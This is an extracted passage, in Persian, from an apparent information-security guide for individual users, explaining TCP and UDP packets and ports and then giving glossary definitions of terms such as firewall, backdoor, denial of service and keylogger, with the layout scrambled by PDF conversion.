‫‪ IP‬ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺗﻤﺎﻣﻲ ﺑﺴﺘﻪﻫـﺎﻱ‬
‫ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺑﻪ ﻣﻘﺼﺪ ﻣﻲﺭﺳﺎﻧﺪ‪.‬‬
‫ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ‬
‫ﺍﻣﺎ ﺩﺭ ﺍﻳﻨﺠﺎ ﺗﻨﻬﺎ ﺑﻪ ﺩﻭ ﻧﻮﻉ ﺍﺯ ﺁﻧﻬﺎ ﺍﺷـﺎﺭﻩ ﻣـﻲﻛﻨـﻴﻢ‪ TCP :‬ﻭ‬
‫‪.UDP‬‬
‫‪ :TCP‬ﭘﺮﻭﺗﻜﻞ ﻛﻨﺘﺮﻝ ﺍﻧﺘﻘﺎﻝ‬
‫‪١٥٢‬‬
‫‪ TCP‬ﭘﺮﻭﺗﻜﻠﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﻴﺸﺘﺮ ﭘﻴﺎﻣﻬﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺷﺎﻣﻞ‬
‫ﻭﺏ )‪ ،(HTTP‬ﭘﺮﻭﺗﻜـــﻞ ﺍﻧﺘﻘـــﺎﻝ ﻓﺎﻳـــﻞ )‪ ١٥٣(FTP‬ﻭ ﻧﺎﻣـــﺔ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﺑﺎﺷﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺩﺍﺩﺓ ﺍﺭﺳـﺎﻝﺷـﺪﻩ‪ ،‬ﺑـﺴﺘﻪ ﻫـﺎﻱ‬
‫‪ TCP‬ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻫﻢ ﻣﻲﺑﺎﺷﻨﺪ‪:‬‬
‫‪١٥٤‬‬
‫•‬
‫‪ ۱۶‬ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺍﺭﺳﺎﻟﻲ؛‬
‫•‬
‫‪ ۱۶‬ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺩﺭﻳﺎﻓﺘﻲ؛‬
‫•‬
‫ﺍﻃﻼﻋﺎﺕ ﺗﺮﺗﻴﺒﻲ‪ ١٥٦‬ﺑﺴﺘﻪﻫﺎ؛ ﻭ‬
‫•‬
‫ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻘﻲ‪.‬‬
‫‪١٥٥‬‬
‫‪١٥٧‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻓﻘﻂ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﺩﺍﺭﺩ ﺍﺯ ﺷﻤﺎﺭﻩ ﭘـﻮﺭﺕ‬
‫ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﭘﻴﺎﻡ ﺭﺍ ﺍﺭﺳﺎﻝ ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ‬
‫ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫـﺪ‬
‫ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﭼﻨﺪﻳﻦ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﺑﺎﺯ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ‬
‫ﺻﻔﺤﺎﺕ ﺩﺭﺧﻮﺍﺳﺘﻲ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ‬
‫ﭘﻴﺎﻡ ‪ TCP‬ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﺑﺎﻳﺪ ﺭﻭﻱ ﭘﻮﺭﺕ ﺻـﺤﻴﺤﻲ ﻣﻨﺘﻈـﺮ‬
‫ﻻ ﺑﺮﺍﻱ ﻫﺮ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﺧـﺎﺹ‪ ،‬ﻳـﻚ‬
‫ﭘﻴﺎﻡ ﺑﻤﺎﻧﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﭘﻮﺭﺕ ﻣﺸﺨﺺ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭘﻮﺭﺕ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﻭﺏ ﻫﻤﻴﺸﻪ ﭘﻮﺭﺕ ﺷﻤﺎﺭﺓ ‪ ۸۰‬ﺍﺳـﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ ﭘﻨﺠـﺮﺓ‬
‫ﻣﺮﻭﺭﮔﺮ ﺭﺍ ﺑﺎﺯ ﻣﻲﻛﻨﻴﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﻳﻚ ﭘﻮﺭﺕ ﺭﺍ ﺑﺮﺍﻱ‬
‫ﺧﻮﺩ ﺍﻧﺘﺨﺎﺏ ﻣﻲﻛﻨﺪ )ﻃﺒﻖ ﻗﺮﺍﺭﺩﺍﺩ‪ ،‬ﺑﺰﺭﮔﺘﺮ ﺍﺯ ‪ (۱۰۲۳‬ﻭ ﺍﻳـﻦ ﻫﻤـﺎﻥ‬
‫ﭘﻮﺭﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺭﻭﻱ ﺁﻥ ﻣﻨﺘﻈﺮ ﭘﻴﺎﻡ ﺍﻳﺴﺘﺎﺩ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻃﻮﻝ ﺑﺴﺘﻪﻫﺎﻱ ‪ IP‬ﻣﺤﺪﻭﺩ ﺍﺳﺖ ﻭ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ‬
‫ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ‬
‫ﺑﻴﺸﺘﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷﺪ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳـﺪ ﺑـﻪ ﻗـﺴﻤﺘﻬﺎﻱ ﻛـﻮﭼﻜﺘﺮﻱ‬
‫ﺗﻘﺴﻴﻢ ﮔﺮﺩﻧﺪ‪ .‬ﻫﺮ ﻗﺴﻤﺖ ﺩﺭ ﻗﺎﻟﺐ ﺑﺴﺘﺔ ‪ TCP‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ‬
‫‪152 Transmission Control Protocol‬‬
‫‪153. File Transfer Protocol‬‬
‫‪154 Sending Port Number‬‬
‫‪155 Receiving Port Number‬‬
‫‪156 Sequencing Information‬‬
‫‪157 Acknowledgement Information‬‬
‫ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻓﺮﺳﺘﺎﺩﻥ ﺗﺮﺗﻴﺒﻲ ﺍﻃﻼﻋﺎﺕ ﺳﺒﺐ ﻣﻲﺷﻮﺩ ﻛﻪ‬
‫ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳـﺎﻓﺘﻲ ﺍﻳـﻦ ﻗـﺴﻤﺘﻬﺎ ﺭﺍ ﺑـﺎ ﺗﺮﺗﻴﺒـﻲ ﺻـﺤﻴﺢ ﻣﺠـﺪﺩﹰﺍ‬
‫ﮔﺮﺩﺁﻭﺭﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻣﺎ ﺑﻪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﺑﺴﺘﻪﻫﺎ ﺳﺮﻳﻌﺘﺮ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺑﻪ ﻣﻘﺼﺪ ﺑﺮﺳﻨﺪ ﻭ ﺍﻳﻦ ﺑﺪﺍﻥ‬
‫ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺧﺎﺭﺝ ﺍﺯ ﺗﺮﺗﻴﺒﻲ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ‬
‫ﺷﺪﻩﺍﻧﺪ ﺩﺭﻳﺎﻓﺖ ﺷﻮﻧﺪ‪ .‬ﺍﺯ ﺳﻮﻱ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻃﺒـﻖ ﺗﺌـﻮﺭﻱ‬
‫ﻣﺎﻫﻴﺖ ‪ IP‬ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺴﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎ‬
‫ﻫﺮﮔﺰ ﺑﻪ ﻣﻘﺼﺪ ﻧﺮﺳﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣـﻮﺭﺩ ﺑﺮﻧﺎﻣـﺔ ﺩﺭﻳـﺎﻓﺘﻲ ﻣﺘﻮﺟـﻪ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺷﻜﺎﻑ ﻣﻴﺎﻥ ﺗﺮﺗﻴﺐ ﺩﺭﻳﺎﻓﺖ ﺑﺴﺘﻪﻫـﺎ ﺭﺥ ﺩﺍﺩﻩ‬
‫ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻛـﻪ ﺑـﺴﺘﺔ ﮔـﻢ ﺷـﺪﻩ ﻣﺠـﺪﺩﹰﺍ‬
‫ﺍﺭﺳﺎﻝ ﺷﻮﺩ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻓﺮﺳﺘﻨﺪﻩ ﻳـﻚ ﺑـﺴﺘﺔ ‪ TCP‬ﺑﻔﺮﺳـﺘﺪ‪ ،‬ﺍﻳـﻦ ﺍﻧﺘﻈـﺎﺭ‬
‫ﻣﻲﺭﻭﺩ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺑﺎ ﺑﺎﺯﭘﺲ ﻓﺮﺳـﺘﺎﺩﻥ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺗﺼﺪﻳﻘﻲ ﻣﺨـﺼﻮﺹ‪ ،‬ﺩﺭﻳﺎﻓـﺖ ﺁﻧـﺮﺍ ﺗـﺼﺪﻳﻖ ﻛﻨـﺪ‪ .‬ﺍﮔـﺮ ﭘﻴـﺎﻡ‬
‫ﺗﺼﺪﻳﻖ ﻳﻚ ﺑﺴﺘﻪ ﺩﺭ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻣﺸﺨﺺﺷﺪﻩﺍﻱ ﺑـﺎﺯ ﻧﮕـﺮﺩﺩ‪،‬‬
‫ﺑﺴﺘﻪ ﻣﺠﺪﺩﹰﺍ ﺍﺭﺳﺎﻝ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺍﻋﺪﺍﺩ ﺗﺮﺗﻴﺒـﻲ ﻭ‬
‫ﺗﺼﺪﻳﻘﻲ ﺑﺴﺘﻪﻫﺎ‪ TCP ،‬ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ‪ ١٥٨‬ﺍﺳـﺖ ﻭ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ‪ ،‬ﻛـﺎﺭﺑﺮ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺍﺷﺘﺒﺎﻩ ﻭ ﻳـﺎ ﺧﻄـﺎ ﺩﺭ‬
‫ﺍﻧﺘﻘﺎﻝ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺟﺮﻳﺎﻥ ﺁﻥ ﻗﺮﺍﺭ ﺧﻮﺍﻫـﺪ‬
‫ﮔﺮﻓﺖ‪.‬‬
‫‪ :UDP‬ﭘﺮﻭﺗﻜﻞ ‪ datagram‬ﻛﺎﺭﺑﺮ‬
‫‪١٥٩‬‬
‫‪ UDP‬ﻗﺎﻟﺐ ﺳﺎﺩﻩﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻫﺮ ﺑﺴﺘﺔ ‪ UDP‬ﻋﻼﻭﻩ ﺑﺮ ﺩﺍﺩﻩﻫـﺎ ﺩﺍﺭﺍﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻧﻴﺰ ﻫﺴﺖ‪:‬‬
‫•‬
‫‪ ۱۶‬ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺍﺭﺳﺎﻟﻲ؛ ﻭ‬
‫•‬
‫‪ ۱۶‬ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺩﺭﻳﺎﻓﺘﻲ‪.‬‬
‫ﺩﺭ ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ‪ ،TCP‬ﺑﻪ ﺩﻟﻴﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﻤﺎﺭﻩﻫﺎﻱ ﭘﻮﺭﺕ‬
‫ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﺑﺘﻮﺍﻧﻨــﺪ ﺑﻄــﻮﺭ ﻣــﻮﺍﺯﻱ‬
‫ﺭﺷﺘﻪ ﻫﺎﻱ ‪ UDP‬ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﺎﻧﻨـﺪ‬
‫ﺩﺭﻳﺎﻓﺖ ﭘﻴـﺎﻡ ﺩﺭ ‪ ،TCP‬ﺑﺮﻧﺎﻣـﻪ ﺑﺎﻳـﺪ ﺭﻭﻱ ﭘـﻮﺭﺕ ﺻـﺤﻴﺤﻲ‬
‫ﻣﻨﺘﻈﺮ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﺑﻤﺎﻧـﺪ‪ .‬ﺩﺭ ‪ UDP‬ﻫـﻴﭻ ﺷـﺮﻁ ﻣﺸﺨـﺼﻲ‬
‫ﺑﺮﺍﻱ ﺗﺮﺗﻴﺐﺑﻨﺪﻱ ﻭ ﺗﺼﺪﻳﻖ ﺑـﺴﺘﻪﻫـﺎ ﻭﺟـﻮﺩ ﻧـﺪﺍﺭﺩ‪ ،‬ﻟـﺬﺍ ﺍﻳـﻦ‬
‫‪158 Reliable Protocol‬‬
‫‪159 User Datagram Protocol‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫‪١١٣‬‬
‫ﭘﺮﻭﺗﻜﻞ ﻧﻴﺰ ﻫﻤﺎﻧﻨﺪ ‪ IP‬ﻧﺎﻣﻄﻤﺌﻦ ﺍﺳﺖ ﻭ ﭘﻴﺎﻣﻬﺎ ﺩﺭ ﺁﻥ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﮔﻢ ﺷﻮﻧﺪ‪ UDP .‬ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﮔـﻢ‬
‫ﺷﺪﻥ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﭘﻴﺎﻣﻬﺎ ﺍﻫﻤﻴﺖ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻭ ﻳـﺎ ﺭﺍﻩ‬
‫ﺳﺎﺩﻩ ﺍﻱ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﭘﻴﺎﻣﻬﺎﻱ ﮔﻤـﺸﺪﻩ ﻣﻮﺟـﻮﺩ ﺑﺎﺷـﺪ‪ .‬ﺍﻣـﺎ ﺍﺯ‬
‫ﻣﺰﺍﻳﺎﻱ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﻳﻦ ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﭼـﻮﻥ‬
‫ﻫﻴﭻ ﺗﺼﺪﻳﻖ ﻭ ﺗﺮﺗﻴﺐﺑﻨﺪﻱ ﺧﺎﺻﻲ ﺩﺭ ‪ UDP‬ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﺍﻳـﻦ‬
‫ﭘﺮﻭﺗﻜﻞ ﻣﻨﺎﺑﻊ ﺑﺴﻴﺎﺭ ﻛﻤﺘﺮﻱ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫‪١١٥‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺩﺭﺏ ﻣﺨﻔﻲ‬
‫ﺿﻤﻴﻤﺔ ‪۳‬‬
‫ﻭﺍﮊﻩﻧﺎﻣﺔ ﺍﺻﻄﻼﺣﺎﺕ ﻓﻨﻲ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬
‫‪١٦٠‬‬
‫ﻣﻌﺎﺩﻝ ﺭﺍﻳﺎﻧﻪﺍﻱ ﭘﺴﺖ ﻧﺎﻣـﻪﻫـﺎ‪ .‬ﺁﺩﺭﺳـﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺗﻤﺎﻣﻲ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻣﺘﻮﻥ‬
‫ﻗﺎﺑــﻞ ﭼــﺎﭖ )ﻛﺎﺭﺍﻛﺘﺮﻫــﺎﻱ ﻏﻴﺮﻛﻨﺘﺮﻟــﻲ ‪ (ASCII‬ﺗــﺸﻜﻴﻞ‬
‫ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‬
‫ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﮔﺬﺭ ﺍﺯ ﻭﺭﻭﺩ ﻋﺎﺩﻱ ﻭ ﺍﻳﻤـﻦ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻭ‬
‫ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑـﺪﻭﻥ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ‬
‫ﺻﺎﺣﺐ ﺁﻥ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﺩﺭﺏ ﻣﺨﻔـﻲ ﺭﻭﻱ ﻳـﻚ ﺭﺍﻳﺎﻧـﺔ‬
‫ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮ ﺷﺨﺼﻲ ﺩﺭ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺘﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻭ ﺭﺿﺎﻳﺖ ﻣﺎﻟـﻚ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ‬
‫ﺁﻥ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﻛﻨﺘﺮﻝ ﺁﻧﺮﺍ ﺑﺪﺳﺖ ﮔﻴﺮﺩ‪.‬‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣـﻲ ﺗﻮﺍﻧـﺪ ﺗﺒـﺎﺩﻝ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺷﻤﺎ ﻭ ﺩﻧﻴﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺁﻧﺮﺍ ﻣـﺴﺪﻭﺩ ﻛﻨـﺪ‪.‬‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺩﻭ ﻧﻮﻉ ﻫﺴﺘﻨﺪ‪ :‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺟـﺮﺍ ﻣـﻲﺷـﻮﺩ ﻳـﺎ‬
‫ﻗﻄﻌﺔ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻣﺠﺰﺍﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﺁﻧﭽﻪ ﺩﺭ ﺷﺒﻜﻪ‬
‫ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪١٦١‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺯﻣﺎﻧﻲ ﺍﺗﻔﺎﻕ ﻣﻲ ﺍﻓﺘﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ‬
‫ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻂ ﭘﻴﺎﻣﻬـﺎﻱ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩ ﻭ ﻏﻴـﺮ‬
‫ﺣﻘﻴﻘﻲ ﺑﻤﺒﺎﺭﺍﻥ ﺷـﻮﺩ؛ ﺑﻄﻮﺭﻳﻜـﻪ ﺗﻤـﺎﻣﻲ ﻭﻗـﺖ ﺧـﻮﺩ ﺭﺍ‬
‫ﺻﺮﻑ ﭘﺎﺳﺦ ﺩﺍﺩﻥ ﺑﻪ ﺍﻳﻦ ﭘﻴﺎﻣﻬﺎ ﻧﻤﺎﻳﺪ ﻭ ﻣﺠـﺎﻟﻲ ﺑـﺮﺍﻱ‬
‫ﻋﺒﻮﺭ ﺗﺮﺍﻓﻴﻚ ﻛﺎﺭﺑﺮ ﻭﺍﻗﻌﻲ ﺑﺎﻗﻲ ﻧﻤﺎﻧﺪ‪.‬‬
‫ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ‬
‫‪١٦٢‬‬
‫ﺑﺮﻧﺎﻣــﻪﺍﻱ ﻛــﻪ ﻫﺮﺁﻧﭽــﻪ ﺍﺯ ﻃﺮﻳــﻖ ﺻــﻔﺤﻪﻛﻠﻴــﺪ ﺗﺎﻳــﭗ‬
‫ﻣﻲﺷﻮﺩ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺍﺩﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺭﻭﻱ ﺩﻳـﺴﻚ‬
‫ﻧﻮﺷﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ‬
‫ﺍﺭﺳﺎﻝ ﮔﺮﺩﻧﺪ‪ .‬ﺍﮔﺮ ﺛﺒـﺖﻛﻨﻨـﺪﻩﻫـﺎﻱ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﺭﻭﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ ،‬ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﮔﺮﺩﺩ‬
‫ ﻣﺜﻞ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ‪ -‬ﺛﺒﺖ ﻣﻲﺷـﻮﺩ؛ ﺩﻗﻴﻘـﹰﺎ‬‫ﻣﺸﺎﺑﻪ ﺣﺎﻟﺘﻲ ﻛﻪ ﺷﻤﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺧـﻮﺩ ﺭﺍ‬
‫ﻭﺍﺭﺩ ﻣﻲﻛﻨﻴﺪ ﻭ ﺷﺨﺼﻲ ﺑﺎﻻﻱ ﺳﺮﺗﺎﻥ ﺍﻳﺴﺘﺎﺩﻩ ﺍﺳﺖ!‬
‫‪160 Email‬‬
‫‪161 Denial of Service‬‬
‫‪162 Keyloggers‬‬
‫‪١٦٤‬‬
‫‪١٦٥‬‬
‫ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻣﺨﻔﻲ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺑﺎﻋـﺚ‬
‫ﻣﻲﮔﺮﺩﺩ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﺣﺘﻲ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ ﻧﺒﺎﺷـﻨﺪ‪ ،‬ﻣﮕـﺮ‬
‫ﺑﺮﺍﻱ ﻛﺴﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨـﺪ‪.‬‬
